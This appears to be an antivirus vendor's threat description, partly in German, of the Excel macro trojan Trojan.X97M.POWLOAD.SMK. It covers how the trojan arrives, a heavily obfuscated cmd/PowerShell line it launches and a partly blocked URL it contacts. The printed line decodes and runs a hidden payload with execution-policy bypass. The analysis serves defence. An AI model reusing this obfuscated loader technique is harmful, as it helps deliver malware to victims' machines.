Trojan.X97M.POWLOAD.SMK

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Übertragungsdetails

It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

Fügt die folgenden Prozesse hinzu:

• CmD /c "sET psA=(.("{3}{2}{1}{0}"-f'CT','bJE','-o','NeW') ("{1}{5}{6}{7}{2}{0}{3}{4}" -f'DefLaT','sYs','on.','E','stream','tem','.iO.comP','rEssi')( [iO.MeMoRYstrEAM][ConveRT]::"FROmBA`sE64`s`T`RinG"({Base-64 encoded}) ,[iO.comPrESsIOn.ComprESsIoNmODe]::"dECOmp`Re`SS" )^|^&("{0}{1}"-f'fOrEaC','H'){ ^&("{0}{1}{2}" -f'NeW-','ob','JECT') ("{2}{3}{1}{4}{0}" -f'R','strEAMre','Io','.','AdE')( ${_} , [SySTEM.TexT.EnCoDIng]::"aSc`II") }^| ^&("{0}{2}{1}" -f'FoRE','H','ac') {${_}."rea`dTOe`ND"( ) } ) ^| . ( ${psH`Ome}[21]+\${P`sHoME}[30]+'X')&&powerSHElL -w 1 -NOPrOfil -nOnINtera -Nol -eXeC bYPAsS set-ItEm vaRiAblE:HQt ([TYPe]( \"{1}{0}{2}\" -f'vI','EN','RoNmeNt' ) ) ; ( ^& (\"{1}{0}{2}\" -f 'aBl','VaRi','e' ) ( \"{0}{3}{4}{1}{2}\"-f 'E','oNco','nTExT','Xe','cuTi' ) ).\"vA`LUE\".\"iN`VoKecO`mMaND\".\"inV`O`kESCR`ipT\"( ( $hQT::( \"{3}{5}{1}{2}{0}{4}\"-f'ENTVar','v','IROnM','Ge','IablE','TEn').Invoke( 'PSa',( \"{2}{1}{0}\"-f'S','cES','Pro' ) )) )"

Andere Details

It connects to the following possibly malicious URL:

• https://{BLOCKED}on.com/StreamGame.rar